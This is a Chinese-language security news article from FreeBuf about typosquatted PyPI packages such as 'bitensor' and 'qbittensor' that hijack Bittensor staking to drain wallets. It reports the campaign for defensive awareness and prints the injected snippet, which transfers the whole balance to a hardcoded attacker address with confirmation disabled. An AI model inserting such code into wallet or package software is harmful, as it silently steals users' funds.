攻击者利用拼写错误的PyPI软件包窃取Bittensor钱包中的加密货币
网络安全研究人员发现攻击者通过PyPI分发恶意软件包,利用"typosquatting"技术诱骗开发者安装篡改的Bittensor软件包。攻击者选择接近合法版本号的变体包名,在质押操作中清空用户钱包。技术分析显示攻击者篡改质押功能代码,转移所有资金至特定地址,并通过多跳洗钱网络转移资金。 2025-8-8 22:24:20 Author: www.freebuf.com(查看原文) 阅读量:12 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

image

网络安全研究人员发现,针对Bittensor生态系统的复杂加密货币窃取活动正通过Python包索引(PyPI)分发恶意软件包实施攻击。攻击者采用"typosquatting"(域名抢注)技术,诱骗开发者和用户安装被篡改的Bittensor软件包版本,最终在常规质押操作中清空用户钱包。

此次攻击经过精心策划,2025年8月6日,五个拼写错误的软件包在短短25分钟内集中发布。这些软件包包括"bitensor"(缺少字母't')、"bittenso"(截断版本)和"qbittensor"(添加前缀)等变体,均旨在模仿真实的bittensor和bittensor-cli软件包。

攻击手法分析

攻击者策略性地选择了9.9.4和9.9.5版本号,与合法软件包版本高度接近,通过开发者的拼写错误或复制粘贴失误,最大化提高误装概率。GitLab分析师通过自动化软件包监控系统发现了这一威胁,该系统标记了与热门Bittensor软件包相关的可疑活动。

调查显示,这是一次精心设计的攻击,利用了区块链常规操作中的信任机制,专门针对参与质押活动且通常持有大量加密货币的用户。

被劫持的质押机制技术分析

该攻击的技术复杂性体现在对bittensor_cli/src/commands/stake/add.py文件中stake_extrinsic函数的合法质押功能进行了精准修改。攻击者在第275行插入恶意代码,完全颠覆了预期的质押流程:

result = await transfer_extrinsic(
  subtensor=subtensor,
  wallet=wallet,
  destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
  amount=amount,
  transfer_all=True,
  prompt=False
)

这段注入代码通过设置transfer_all=True来清空整个钱包而非仅转移预期的质押金额,同时prompt=False绕过了用户确认对话框,具有极高的破坏效率。硬编码的目标钱包地址作为被盗资金的收集点,随后通过涉及多个中间钱包的多跳洗钱网络进行资金转移,最终到达整合地址。

参考来源:

Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/443650.html
如有侵权请联系:admin#unsafe.sh